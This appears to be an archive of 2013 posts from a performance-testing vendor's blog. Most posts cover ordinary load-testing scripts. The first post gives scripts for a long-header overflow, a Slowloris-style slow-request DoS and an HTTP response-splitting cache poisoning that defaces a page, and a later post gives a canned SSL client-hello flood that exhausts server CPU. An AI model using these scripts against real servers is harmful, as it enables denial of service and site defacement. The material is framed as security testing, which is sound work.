Monday, December 30, 2013

A performance test platform as Low Orbit Ion Cannon


     Networking security has gained a lot of attentions over the years and has become one of the top reasons that keeps a web site owner awake at night.   In this blog, we are going to talk about how the NetGend, a performance test platform,  can help with security testing.

     By nature,  any powerful performance test platform can be turned into a DDoS testing platform.   NetGend platform with its ability to  emulate 50,000 concurrent virtual clients on one box is not an exception.  Compared to the famous DDoS tool LOIC (Low Orbit Ion Canon, a cool name!),   NetGend can support more concurrent sessions,   more realistic emulation of clients.

    On NetGend platform, emulation of  sophisticated clients is done by using a javascript like script.  Unlike LOIC which can send simple messages,  NetGend can send dynamic messages with lots of moving parts (i.e variations in the messages) and on top of it,  it can engage with the victim server through complex interactions  as good clients.    It can really cause some pain on web servers for DDoS testing.

     First let's try to cause buffer overflow with a long HTTP header.  In the following script, we use built-in function "repeat" to create a "Referer" header that's is 20,000 bytes long:
 function VUSER() { 
      httpHeader.Referer = repeat("A", 20000);  
      action(http, "http://www.example.com");  
 }  

     Similarly, you can add more long HTTP header such as "XYZ":
    httpHeader.XYZ = repeat("A", 30000);  

     Creating HTTP requests with long headers is quite easy.  Let's look at the Slowris attack, which has become a popular attack against servers.  Here an attacker causes DoS on a web server by sending HTTP requests very slowly, exhausting all resources (connections) on the server.  Original script is quite long.   Here we can do a simpler version in a few short lines:
 function VUSER() { 
      connect("www.example.com", 80); 
      http.POSTData = "name=jin&pass=123";  
      a = createHttpRequest("http://www.example.com/");  
      for (i = 0; i < length(a); i ++ ) {  
           send(substr(a, i, 1));  
           sleep(5000);  
      }  
 }  

   In the above script, we create a connection to the web server and then create a valid HTTP POST request and send it one character at a time and wait for 5 seconds between sending each character. By spawning many VUsers (up to 50,000), we will chew up all the connection resources on a server.
 
    The above two examples are quite simple in concept,  to conclude our blog, let's look at an example where lots of creativity was involved in crafting a special HTTP request with malicious intention. Kudos to the researcher(s) who found it.  This attack is called "HTTP cache poisoning" and is documented here.

    This is an attack on the http cache server. The following diagram from a blog by Bertrant Baquet shows the position of a HTTP cache server.  In the normal operation, when a HTTP cache server receives a request, it will search for the cached transactions, if found one, it will send the response from the cache,  otherwise, it will forward it on to the web server and then send the response from the web server back to the client side.

     The idea of the attack is to send one request from the client and make the server's response appear to be two responses from the cache server's point of view.   This attack will work, for example, when the web server has a dynamic page that will redirect based on the incoming URL.   For example, when the incoming request is the following
http://www.example.com/redirect?page=http://www.test.com 
it will send a 302 response with the "Location" header being "http://www.test.com".    By cleverly crafting a message in place of the highlighted part, the attacker (on client side) can control what the server sends.

     In the following script, the specially crafted message (called "poison") is in bold,  we use the function "toUrl()" will escape it so it can be included as part of the URL.
 function VUSER() {  
      connect("www.example.com", 80);
      httpHeader.Pragma = "no-cache";
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg); //turn off cache
      poison = "
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2015 14:50:18 GMT
Content-Length: 21
Content-Type: text/html

<html>defaced!</html>";
      poison = toUrl(poison);
      msg = createHttpRequest("http://www.example.com/redir.php?page=${poison}");
      send(msg); //add the poison
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg);
}

    As a result, the HTTP cache server will put <html>defaced!</html> as the cached response for the home page!

    From a web server owner's point of view, both security and performance are important, isn't it nice to have one platform that can test both?

Friday, December 27, 2013

How to resume an interrupted performance test



    Recently I read an interesting blog on "Handling consumable parameter data in LoadRunner" by Stu, a veteran on performance test.  Even though it's about loadrunner, the underlying problem itself is applicable to all performance test platforms.

    The problem may come naturally when you run performance tests. Think about this scenario: you have a csv file with 100,000 users and you need to register these users.  Half way through, there is a problem or you need to leave,  so the test has to be stopped.  When you come back to continue with the test, you need to resume from where you left. You can make a note (or a mental note) where the test stopped, but it's cumbersome, especially when you have to start and stop test multiple times.

    Stu's blog gave multiple creative solutions, however, none of them are quite simple due to the design limitation of Loadrunner.  On NetGend, we have the concept of  "permanent" variable and it solves the problem nicely.   A variable is "permanent"  if the value of the variable is stored in a permanent place (like in a file). So even after the test program was stopped, the value of the variable is still there,  when you run the test again, the "permanent" variable will continue with the value left from the previous run.

    Permanent variables can be created with "createPermVar()" function.   It takes two parameters, the first one is the name of the permanent variable,  the second parameter is the name of the file to store the value of the permanent variable.

 createPermVar( <variableName>, <fileName>);  

    Here is a simple example that shows how to use it. The file "users.csv" contains rows of usernames and passwords.

 function userInit() {  
      createPermVar(index, "perm.txt");  
      var allUsers = fromCSV("users.csv");  
 }  
 function VUSER() {  
      x = getNext(allUsers, index);  //x[0] is username, x[1] is password
      index ++;  
      http.POSTData = "username=${x[0]}&password=${x[1]}";  
      action(http, "http://www.example.com/register");  
 }  

    In the above script, the variable "index" is a permanent variable, whenever its value changes (as by   index ++), it will be implicitly stored in a file.

    If the file (in this case "perm.txt") doesn't exist, the permanent variable ("index" in this case) will have initial value of 0 (when used as an index, it refers to the first element in an array) and the file will be created.

     You may be concerned with the impact on performance due to storing value to a file - we all know writing to a file can be slow, especially on the disk seeking.  Rest assured, storing values in our case is actually very fast!  Our performance evaluation on this operation shows that we can achieve 2,000,000 operations per second on a slow PC.

     Now you see how the "permanent" variable works.  Does your favorite test platform have this feature?

Wednesday, December 25, 2013

Random element in an array


    In performance testing, we sometimes need to deal with a list of values.  For example, when we test an e-commerce web site, we may need to extract a list of products from a page.  With the list/array extracted, we can do operations such as randomly picking an item to view or to add to cart.  On some platform, this logically simple operation can be a daunting job.

    Saw an interesting blog by Howard Clark on testing Peoplesoft Financials 9.0 using loadrunner: "Randomly Selecting an Array of Values and Using That Value As A Parameter".  Here is the script to pick a random BUID copied from that blog. It's listed here just to show how complex it is - you don't have to read it.

 int TotalNumberOfBUIDs;  
 char TotalNumberOfBUIDschar[3]; //working variable  
 char *AvailableBUIDsparam; //working variable  
 web_reg_save_param(“AvailableBUIDs”,  
 “LB/IC=class=’PSSRCHRESULTSODDROW’ >”,  
 “RB/IC=”,  
 “Ord=All”,  
 “Search=Body”,  
 “RelFrameId=1″,  
 “Notfound=error”,  
 LAST);  
 TotalNumberOfBUIDs=atoi(lr_eval_string(“{AvailableBUIDs_count}”));  
 TotalNumberOfBUIDs = rand() %TotalNumberOfBUIDs;  
 lr_output_message(“%d”, TotalNumberOfBUIDs);  
 itoa(TotalNumberOfBUIDs, TotalNumberOfBUIDschar, 10); //working variable conversion  
 lr_save_string(TotalNumberOfBUIDschar, “BUIDindex”);  
 AvailableBUIDsparam = lr_eval_string(“{AvailableBUIDs_{BUIDindex}}”);  
 lr_save_string(AvailableBUIDsparam, “BUIDs”);  
 lr_save_string((lr_eval_string(lr_eval_string(“{BUIDs}”))), “BUID”);  
 “Name=VCHR_ERRC_WRK_BUSINESS_UNIT”, “Value={BUID}”, ENDITEM, //application of the value that was captured and then randomized  

    While I was impressed by the author's skills in C,  I couldn't help wondering how an average test engineer can do this.  They know their test subject well, but writing such complex C program can be well above their heads.   On Netgend platform, it's so much easier.

 AvailableBUIDs = substring(str, "class=’PSSRCHRESULTSODDROW’ >", "<", "all");  
 TotalNumberOfBUIDs = length(AvailableBUIDs);
 BUIDindex = randNumber(0, TotalNumberOfBUIDs-1); //indexing is 0 based  
 BUID = AvailableBUIDs[BUIDindex];  //variable "BUID" now contains a random value.

    Even though we tried to use the same variable names as in loadrunner script, our script is still much shorter and easier to understand.  Here are some of the reasons for the simplicity:
  • In a NetGend script, all variables are local to an instance/Vuser.  There is no need to use API to get the value of a variable (called "parameter" in Loadrunner) into code space or write the value back to the variable after some operations in the code space.
  • NetGend supports the array variable.  In this case, the variable "AvailableBUIDs" holds the array of extracted BUIDs.
  • You can get the length of the array by the function "length()".
  • You can get any element in the array by indexing using [].  For example: AvailableBUIDs[BUIDindex] gives the value of "BUIDindex+1"th element. (it's 0 based)
    Note that the above short script (4 lines) can be made even shorter.   The readability may suffer a little bit but it's still fairly easy to understand. 
 AvailableBUIDs = substring(str, "class=’PSSRCHRESULTSODDROW’ >", "<", "all");  
 BUID = AvailableBUIDs[randNumber(0,length(AvailableBUIDs)-1)];  

    A good performance test platform needs to make complex test scenarios simple, not the other way around.

Monday, December 23, 2013

Performance testing in the ocean


  Vacation by cruise ship is pleasant. You got to see beautiful places, eat great food and experience fun events -- all for a low price.  I am not working for a cruise line but I love taking cruise so much that I can't help speaking like one :-)   Cruise is not without its problems, one of them is,  internet access.  We are not talking about checking internet every hour or every minute for news, emails etc.  After all, you are on the cruise ship for fun.  Many guests do need to share their pictures, stories with their friends and stay connected.

   So what's the issue with internet access on a cruise ship? It's slow and expensive - some goes like $0.75/min.  Internet access in the land goes through cable, DSL or wireless links,  but on a cruise ship it will have to go through the satellite link, that's the fundamental reason why it's slow and yet expensive. I can understand this.   But I can't understand why the login process is so slow -  it can take dozens of seconds.  The servers needed for login process are all on the ship, the information needed is simple - just username and password.  So my guess is that the server software is not thoroughly tested for their performance.

    If you are wondering whether there is a need to do performance testing on a cruise ship,  consider the following facts:

  • There are close to 4000 guests on ship,  many with smartphones, tablet PCs or laptops,
  • Many probably will try internet access between two events (for example, the time between two shows),   
  • users have to log in and log off multiple times -  login to check out some emails, go offline to avoid the high per-minute charge, compose responses and log back in to send them. 

    I took a quick look at how I would performance-test it.  The login process itself is pretty simple  - just sending the following HTTP POST data to the server (UserID and Password changed for anomity).
 //the following are the HTTP POST data sent to server during login
 FRM_VERB:FRM_VERB_LOGIN  
 hdnPageName:WIRELESS_LOGIN  
 UserID:jsmith  
 Pass:abc123  
 Image1.x:18  
 Image1.y:30  
    Note that there are 4 hidden fields in the form.

    If I were testing it using NetGend platform,  I could use the following script to test it out.  In a nutshell, here is what the script does:
  • In userInit() part,  it preloads a csv files,  each of its rows contains a username and password. 
  • In VUSER() part,  it will get the login page.  Then it will "fill" the form with a pair of username and password read from the csv file and do the "login".
  • Finally it will logout.
 function userInit() {  
      var db = fromCSVFile("users.txt");  
      var index = 0;  
 }  
 function VUSER() {  
      action(http,"http://10.10.10.10/login.asp");  
      a = db[index];  
      index ++;  
      info.UserID = a[0];  
      info.Pass = a[1];  
      http.POSTData = fillHtmlForm(http.replyBody, info);  
      action(http,"http://10.10.10.10/login.asp"); 
      x = randNumber(30000, 600000); //sleep randomly from 30 to 600 seconds (10min)
      sleep(x);
      action(http,"http://10.10.10.10/logoff.asp");
 }  

   Observant readers may find that it doesn't deal with the "hidden" fields when it sends the HTTP POST  data for login. That's because the function "fillHtmlForm()" will take care of hidden parameters so users  don't have to set up complex regular expression (or something equivalent) to capture the hidden parameters and put it back in the HTTP POST Data.

   The need for performance testing is everywhere,  you just can't escape it - even in the middle of the ocean.

Saturday, December 14, 2013

Fun with Performance test platform


    In previous blogs, we showed that the NetGend application performance test platform can be used for business - web service performance testing.   This blog covers a story about using it to do something fun.

    It started with my upcoming cruise vacation.  I planed to bring my running shoes and go to gym every afternoon - how else can deal with so much good food?  I used to listen to the NPR radio station while running, but in the middle of the ocean, there would be no radio nor high speed internet, my only choice would be podcasts.  My favorite is the Market Place from APM.

    Searched the APM web site but didn't find the list of podcasts - the best I could find was the podcast for yesterday.  Eventually Google brought me to this page in the apple itune store.  It seemed promising.

     Unfortunately I didn't have iTune installed on my Ubuntu PC and didn't intend to do it only to download these podcasts for my cruise vacation.   While being a little disappointed,  I noticed that the HTML page had something that looked like URLs for the podcasts  (see the highlighted parts in the following).   I copied and pasted one of the values  to my browser's address bar, yes, that was exactly what I had been looking for!

 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/bFRhvGqQpxg/marketplace_podcast_20131211_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-11-13 Marketplace - Certainty?" adam-id="209223815" row-number="0" class="podcast-episode">  
 ....  
 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/o6MbaCEnmbU/marketplace_segment24_20131210_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-10-13 Marketplace - Volcker? He rules!" adam-id="207293711" row-number="1" class="podcast-episode">  
 //more than 20 of them

    To grab all the values of this attribute, we needed to use a XPath like //tr/@audio-preview-url. Luckily it's supported by NetGend. So I wrote a simple script to get all the URLs for the podcasts. Downloading a podcast and writing it to disk is pretty simple.
 function VUSER() {   
      action(http, "https://itunes.apple.com/us/podcast/apm-marketplace/id201853034");  
      a = fromHtml(http.replyBody, '//tr/@audio-preview-url');  
      for (i = 0; i < getSize(a); i ++) {  
           if (match(a[i], /\/([^\/]+)$/)) {  //extract the file name from URL
                fName = g1; 
                println("downloading ${a[i]}");  
                fileName = g1;  
                action(http, a[0]);  //download the URL
                writeFile(fileName, http.replyBody);  
           }  
      }  
 }   

   Running this gave me the podcasts which I then transferred to my smartphone.  I was filled with joy - on the one hand, I got the podcasts I need, on the other hand, I realized that this test platform can also be used for something other than testing!    I know it's possible that there are other tools that can do the above, but can you image a performance test platform is able to  do it so easily?

Thursday, December 12, 2013

How bad is a security threat?




    Recently I met my friend Percy, who is a technical guru I respect.  Our talk inevitably moved on to something technical on SSL - how many SSL handshakes can a server support.  He sent me an interesting security threat report of DDoS on HTTPS servers.

    This report indicates that HTTPS servers may suffer from the SSL re-negoation attacks thanks to the THC tool.  Even if the re-negotiation is turned off,  the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol.  So it remains an attack vector.

    To get an idea on how bad the server CPU exhaustion can be, I started wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake process.  SSL handshake involves multiple steps, first step is that client side sends a client-hello message to the server side.   According to the wireshark, just replying to a client-hello message causes server to do 5ms' worth of intensive computation (my server has an AMD quad-core CPU:  Athlon II X4 645, 3.1 GHz).

    Our NetGend platform can setup tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side and yet cause the server to be busy.   Some SSL handshaking steps may still cause the client side to do some nontrivial computations, so it's better to send a canned client-hello message which causes the client almost no computing time.

    First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".

 16 03 01 00 cc 01 00 00 c8 03 01 52 a2 93   
 34 0b 60 fd c9 59 ba 0c 8a 38 cc c7 b4 96 fa 50   
 09 cc 46 f2 40 2b e1 12 e7 99 3e 98 25 00 00 5a   
 c0 14 c0 0a 00 39 00 38 00 88 00 87 c0 0f c0 05   
 00 35 00 84 c0 12 c0 08 00 16 00 13 c0 0d c0 03   
 00 0a c0 13 c0 09 00 33 00 32 00 9a 00 99 00 45   
 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07   
 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14   
 00 11 00 08 00 06 00 03 00 ff 02 01 00 00 44 00   
 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 01 00   
 02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00   
 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00   
 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00   
 23 00 00   

   Then we create the following script to run on the NetGend platform.
 function userInit() {  
      var data = readFile("clientHello.txt");  
      data = fromHexString(data);  //this will convert hex bytes to binary data
 }  
 function VUSER() {  
      connect("10.3.0.3", 443);  
      send(data);  
      recv(msg);  
      //close() is unnecessary, the connection will be closed at the end of VUser.
 }  

     The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz)  but when it sends the client-hello messages at a rate about 2900/second (over multiple connections), the server side is almost completely busy (see the highlighted CPU idle percentage).
 Tasks: 265 total,  2 running, 260 sleeping,  0 stopped,  3 zombie  
 Cpu(s): 81.8%us, 15.0%sy, 0.0%ni, 0.3%id, 0.0%wa, 0.0%hi, 2.8%si, 0.0%st  
 Mem: 16177816k total, 14040884k used, 2136932k free,  524640k buffers  
 Swap: 3929084k total,    0k used, 3929084k free, 9915940k cached  
  PID USER   PR NI VIRT RES SHR S %CPU %MEM  TIME+ COMMAND                     
 18152 www-data 20  0 1961m 4008 1248 S  61 0.0  6:28.21 /usr/sbin/apache2 -k start            
 18462 www-data 20  0 1961m 4012 1248 S  61 0.0  0:41.27 /usr/sbin/apache2 -k start            
 18578 www-data 20  0 1961m 3984 1136 S  60 0.0  0:06.15 /usr/sbin/apache2 -k start            
 18151 www-data 20  0 1961m 4008 1248 S  59 0.0  6:26.73 /usr/sbin/apache2 -k start            
 18354 www-data 20  0 1961m 4644 1592 S  59 0.0  4:10.70 /usr/sbin/apache2 -k start            
 18490 www-data 20  0 1961m 3964 1104 S  59 0.0  0:40.16 /usr/sbin/apache2 -k start     
 17227 admin    20   0 3470m 2.2g 2.2g S   32 14.1  18:15.93 /usr/lib/vmware/bin/vmware-vmx -ssnapshot.num
    The VM process used to take 10% CPU on one core, it takes much more now due to the CPU resource contention.   While I can still use real browser to access HTTPS pages, it's clear that the server is VERY busy.

    So, it's good to be aware of a possible security threat,  it's even better to get some idea on how bad it can be -  the peace of mind matters.  NetGend can give you that peace of mind.


 



 




Tuesday, December 10, 2013

Performance testing on REST API


    RESTful API has great promises in simplifying the development on web/smartphone apps and handling a larger number of clients.  How can we effectively test servers that support RESTful APIs?

   To load-test RESTful service, we need to be able to generate HTTP requests with methods like "PUT", "DELETE" etc.  You are right, they may not be the familiar ones like GET, POST,  but on NetGend platform, it's easy to emulate just about any HTTP method:

 http.method = "PUT";  
 //or  
 http.method = "DELETE".  

    Note that by default, the http method is "GET" on NetGend platform,  if you need HTTP POST method,  you can simply do it by
 http.method = "POST";  
 //or just specify there is http POST data.  
 http.POSTData = "name=john&city=houston";  

    When you generate HTTP Body in JSON format (say for HTTP Post message),  you can either use a template or use the function combineHttpParam.
 http.POSTData = q|{ "name": "john", "city": "Houston", "age": "23"}|;  
 //or  
 person.name = "john";  
 person.city  = "Houston";  
 person.age  = 23;  
 http.POSTData = combineHttpParam(person);  

    Did you notice that the you don't have to escape the double-quotes in the template?   On the other test platforms you may have to write { \"name\": \"john\", \"city\": \"Houston\", \"age\": \"23\"} ?  If you think escaping is a pain, you are not alone!  Now you understand why I think it's a pleasure to do it on the NetGend platform.

    The URL path for RESTful request may look like the following:
/rest/8af909ffefa9/getDiston.json/10001/20002/mile, it can be generated in two ways.

 //method 1, by variable substitution 
 /rest/${apiKey}/getDiston.json/${zip1}/${zip2}/${unit}  
 //assume you have the variables defined  
or
 //method 2, by join an array
 a[0] = apiKey;  
 a[1] = "getDistance.json";  
 a[2] = zip1;  
 a[3] = zip2;  
 a[4] = "mile"; //can have other unit  
 apiMsg = join(a, "/");  
 action(http, "http://www.example.com/rest/${apiMsg}");  

    HTTP responses for RESTful are increasingly in JSON format.  Parsing JSON message is pretty simple on NetGend platform and has been covered many times in the previous blogs.  The following is an example of JSON message from a site that implements a "todo" list.

 [ {"id": 1,  
     "text": "reserve lunch"  
    }, {"id": 2,  
     "text": "fix mower"  
    }, {"id": 3,  
     "text": "buy grocery"  
    }]  

     Let's put all these together and try to test the RESTful site for "todo" list by implementing the following sequence.
  • Get a list of existing "todos"
  • randomly delete one of them
  • add a new one 
  • update a random "todo"

 action(http, "http://www.example.com/todos/"); 

 //delete a random one 
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{"id": ${id}}|;  
 http.method = "DELETE";  
 action(http, "http://www.example.com/todos");  

 //add a new one  
 http.POSTData = q|{"text": "talk to insurance agent"}|;  
 action(http, "http://www.example.com/todos");  

 //update
 action(http, "http://www.example.com/todos/");  
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{ "text": "updated content!", "id": ${id}}|;  
 http.method = "PUT";  
 action(http, "http://www.example.com/todos");  

    There are obviously more test scenarios,  I am sure they will feel just as pleasant like this one!

Sunday, December 8, 2013

goto considered helpful (in some cases)!


    There are occasional debates on whether it's good to have "goto" statements in a program or even in a programming language.  The typical argument by a proponent is a little weak:  "goto" can help jumping out of a nested loop. As far as I can see,  the proponents are typically on the losing side.    Sadly, I am one of them.  In this blog,  we are going to present a better argument   using "goto" can be natural for certain audience in some cases.

    Some developers may argue that we can use "if", "while" etc to accomplish what "goto" statements can do.    Yes, that's true, but it doesn't feel natural and easy for our audience: those without a lot of programming background.  "goto" (or jump) feels more familiar for them.

   On Netgend test platform,  we use javascript syntax. It may appear that it's impossible to support "goto" since javascript language itself doesn't support it.  We came up with the following way around it. To set a label, you can call a function "setLabel(<labelName>)",  to jump to a label, you can call "goto(<labelName>)".

    Here is a simple example to illustrate how it is used.
  function VUSER() { 
      id = 2; 
      println("start");  
      setLabel("test1");  // <--- set the label here
      println("hello"); 
      id --; 
      if (id > 0) {  
            goto("test1"); // <--- jump to label
      }  
      println("world");
 }  

    In this example, the println("hello"); statement will be executed twice (the second time is due to the "goto" statement),  the output is
 start  
 hello  
 hello  
 world  

    Now let's look at an example that's a little more realistic:  we need to emulate sensors trying to register with a master. Master node may ask a sensor node to wait a little bit and try again.

 function VUSER() {
       connect("1.1.1.1", 12345);  
       setLabel("register");  
       send("register by ${userId}");  
       recv(response);  
       if (match(response, /please wait (\d+) ms/) {  
          sleep(g1);  
          goto("register");  
       }  
       //now send data to master 
}

    It's true that the above logic can be done with a while loop, but it's much easier for a test engineer to understand the logic if we use "goto" here.

    Finally as a simple, real world example, we need to emulate a user who visits an e-commerce site,  with the following distribution:
  • 70% probability, the user will just browse the product
  • 20% probability, the user will exit the site.
  • 10% probability, the user will register and continue to browse product
 function VUSER() {
       action(http, "http://www.example.com");  
       isRegistered = 0;  
       browsePercentage = 70;
       exitPercentage = 20;
       registerPercentage = 10;

       setLabel("userAction");  //<--- let the fun start
       if (isRegistered == 0) {  
            choice = rolldice([browsePercentage, exitPercentage, registerPercentage]);  
       } else if (isRegistered == 1) {  
            choice = rolldice([browsePercentage, exitPercentage]);  
       }  
       if (choice == 0) { //browse product
            //pick a product and view it  
       } else if (choice == 1) { //exit site  
            return 1;  
       } else { //register  
            //register actions
            isRegistered = 1;  
            browsePercentage += registerPercentage;  
        }  
       goto("userAction");  
}
    The rolldice() function above will pick a choice (it's 0 based) according to the percentages. Based on the value of choice, we perform one of the 3 actions and go back to "userAction" to decide what to next.

    Human mind is wired to understand "goto" faster, let's keep it that way for performance testing.

Friday, December 6, 2013

Performance testing on an online library



     Recently we tested an online library. This library serves many technical documents,  each document is in the form of a book.  Users can search and read the books all from his/her browser.    We need to find the capacity of this library, defined as  the number of users that can use this library concurrently and still have positive experience.

   The development team had gone out of their way to make the user experience as pleasant as possible, for example, when a user flips a page, it will load immediately, why? the system will try to pre-load the next page while the user is reading the current page.  Assume a user spends an average of 20 seconds reading a page, we want to find out how many users can the library serve while most of page loading times are still within  20 seconds.

   In summary, here is a simple test scenario:
  • user login to the library
  • pick a book
  • go to a random page in the book and read all the way to the last page. 
     The login step is relatively simple and so is the step on getting a list of books.  The hard part is to emulating a user flipping through the pages.  The web page representing a book contains a flash application.  According to the developer tool,  when user flips to the next page, the flash application will send a HTTP request like  the following:
 .../<bookId>/<prefix><pageNumber>.swf  

    It's easy to find the list of book IDs.  However, it's not quite easy to find the following

  • "prefix" (it varies with the bookId)
  • max pages of the book - used to generate a random page in the book
    Luckily, the following blob of text in the HTML page of the book has the information we need (see the bold text).
 function(){setPreviewSource('/123456789/410/{ef[*,0].swf,96}&DownloadEnabled=false&PrintEnabled=false&PrintOnePageEnabled=false','/bitstream/123456789/410/3/ef.js','/bitstream/123456789/410/2/6515695376  

     With this observation, we can easily write a script to extract those fields
  • URL Path (green part), 
  • prefix (the yellow part)
  • max number of pages (pink part).
     We are going to use regular expression setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/ to do the extraction.
 //script A
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = "jsmith@example.com";   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      for (id = 1; id < 500; id ++) {  
           action(http, "http://www.example.com/handle/123456789/${id}");  
           if (match(http.replyBody, /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/) {  
                println("${g1},${g2},${g3}");  
           }  
      }  
      action(http,"http://www.example.com/logout");   
 }  
     Note that the three variables g1, g2, g3 represent the 3 fields extracted by the regular expression. We run it with 1 Vuser and collect the outputs of "println" to produce a csv file (say, "books.csv") which we will use in the next step.  The csv file looks like:
 ...  
 /123456789/410,ef,96  
 ....  

    On a side note, this shows that our platform can not only be used for performance testing, it potentially can be used to build handy tools :-)

    Now we are going to use the csv file in the implementation of the test scenario,

  //script B
 function userInit() {  
      var db = fromCSV("books.csv");  
 }  
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = toUrl("jsmith@example.com");   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      a = getNext(db);  

      for(num = randNumber(1, a[2]); num <= a[2]; num ++ ) {
           action(http,"http://www.example.com/handle/${a[0]}${a[1]}${num}.swf");  
           if (http.totalRespTime > 20000) {  
                print("${http.totalRespTime},${http.url}");  
           }
      }
 }  
     Here the function call getNext(db) will grab the next row in the csv file,  each row consists of 3 elements: URL_path,  prefix and max_pages. Denoted by a[0], a[1], a[2] respectively.   So randNumber(1, a[2]) simply means a random page in this book.
     We ran the script B multiple times, each time with a different number of VUsers and found the number of Vuser when the response times are still acceptable.  The development team are quite happy at how simple the scripts are. They have tried JMeter, which was not as flexible.

    Development of an online library can be challenging, performance testing on the library doesn't have to be, what do you think?

Tuesday, December 3, 2013

Use caution when migrating to the cloud

     Cloud platform has become increasingly popular thanks to its better sharing of hardware resources.  More and more services are being migrated to it.  However, along with the benefits, it carries some concerns on performance that we are going to look at in this blog.

    Recently I did a performance test against an online library.  We need to login to the site and pick a book and emulate user browsing through pages of the book.

    It's fairly easy to develop script on NetGend platform (URLs and names are obscured to keep the site anonymous)
 function VUSER() {  
      action(http,"http://www.example.com"); //this step will get a sessionID in cookie  
      a.login_email = toUrl("jsmith@example.com");  
      a.login_password = "abc123";  
      http.POSTData = combineHttpParam(a);  
      action(http,"http://www.example.com/password-login");  

      for (id = 1; id < 340; id ++) {  
           action(http,"http://www.example.com/1234567/19/11h${id}.swf");  
           println("${id},${http.totalRespTime},${http.url}");  
      }  
 }  

    To my surprise,  the response times (defined as the time between the transmission of HTTP request and the last packet of HTTP response) vary from  234ms to 1911ms.  Since the HTTP response sizes for these transactions are about the same,  I wonder what caused the variation in response times.

    Luckily I have a friend called "wireshark", the world's most famous packet sniffer.  According to the packet capture shown on wireshark, there is a range of packets with long delays among them.  There are no dropped packets (hence no packet re-transmissions) here,  so there are two possibilities left:
  • Delay was caused by the server.
  • Delay was caused by the network elements (like routers) along the path between the server and my PC.
    At this point, it appears impossible to determine which one is the real cause.  Thanks to the TCP timestamp option (which is turned on by default),  it's possible to determine where the delay happened.   Why? because the timestamp in TCP option (last part TCP header, if present) was set by the server when a TCP packet was sent. By looking at the variation on TCP timestamp , we can infer whether the delay is caused by the server or the network.

    Here is what I gathered from the wireshark packet capture:

 1 0.000000000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 2 0.000375000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 3 0.000500000 192.168.5.105 38922 1.1.1.1 80 TSval 66747395  
 4 0.000675000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 5 0.035894000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383936  
 6 0.035929000 192.168.5.105 38922 1.1.1.1 80 TSval 66747404  
 7 0.188478000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 8 0.188825000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 9 0.188856000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 10 0.189142000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 11 0.189454000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 12 0.189479000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 13 0.189764000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  

    The second column is the sniffer timestamp (when the packets are captured by sniffer), the last column is the TCP timestamp.  One challenge here is to find how much time one unit of timestamp is equivalent to.

    Let's take a look at 3 packets whose TCP timestamp changed (see the numbers in bold):

  • between packets 4 and 5, there is a difference of 9 (from 1483383927 to 1483383936) and the difference in timestamp is about 36ms (more precisely 35.2ms). On unit of time is roughly 4ms
  • between packets 5 and 7, there is a difference of 38 (from  1483383936 to 1483383974) and the difference in timestamp is about 153ms, again, one unit of time is roughly 4ms.
    So based on packets 4, 5 and 7,  we can conclude TCP timestamp changes match with the those of sniffer timestamp for these packets, which indicates that network didn't delay the packets, the big delays between the packets are caused the server.

    Later on, it was confirmed that the server was running on a cloud based platform, possibly sharing a hardware with some noisy/busy neighbors.  While 153ms of unexpected delay may not be much, but it can accumulate and not all applications can tolerate it.    Now you know sharing the hardware can be double-edged sword, you are warned on your road to the cloud :-)
   

Monday, December 2, 2013

Performance testing on ftp servers


    FTP servers used to be very popular in the 90's, they are still in use nowadays, but mainly to serve large contents, especially software packages.   Browsers support them by default so you may not even notice it when you trigger a ftp transaction by clicking a link.   In this blog, we will cover performance testing on ftp servers.

    NetGend platform supports all the ftp transactions: ls, get and put ....

    First, let's look at an example on uploading a file to a server.   Suppose we need to upload a local file  "users.csv" to a remote file "tmp.txt" in the directory of "www/test".   Here is the simple script.
 function VUSER() {  
      connect("ftp.example.com", 21);  
      action(ftp, login, "jsmith", "abc123");  
      action(ftp, op, "cd", "www/test");   
      action(ftp, op, "pwd");  
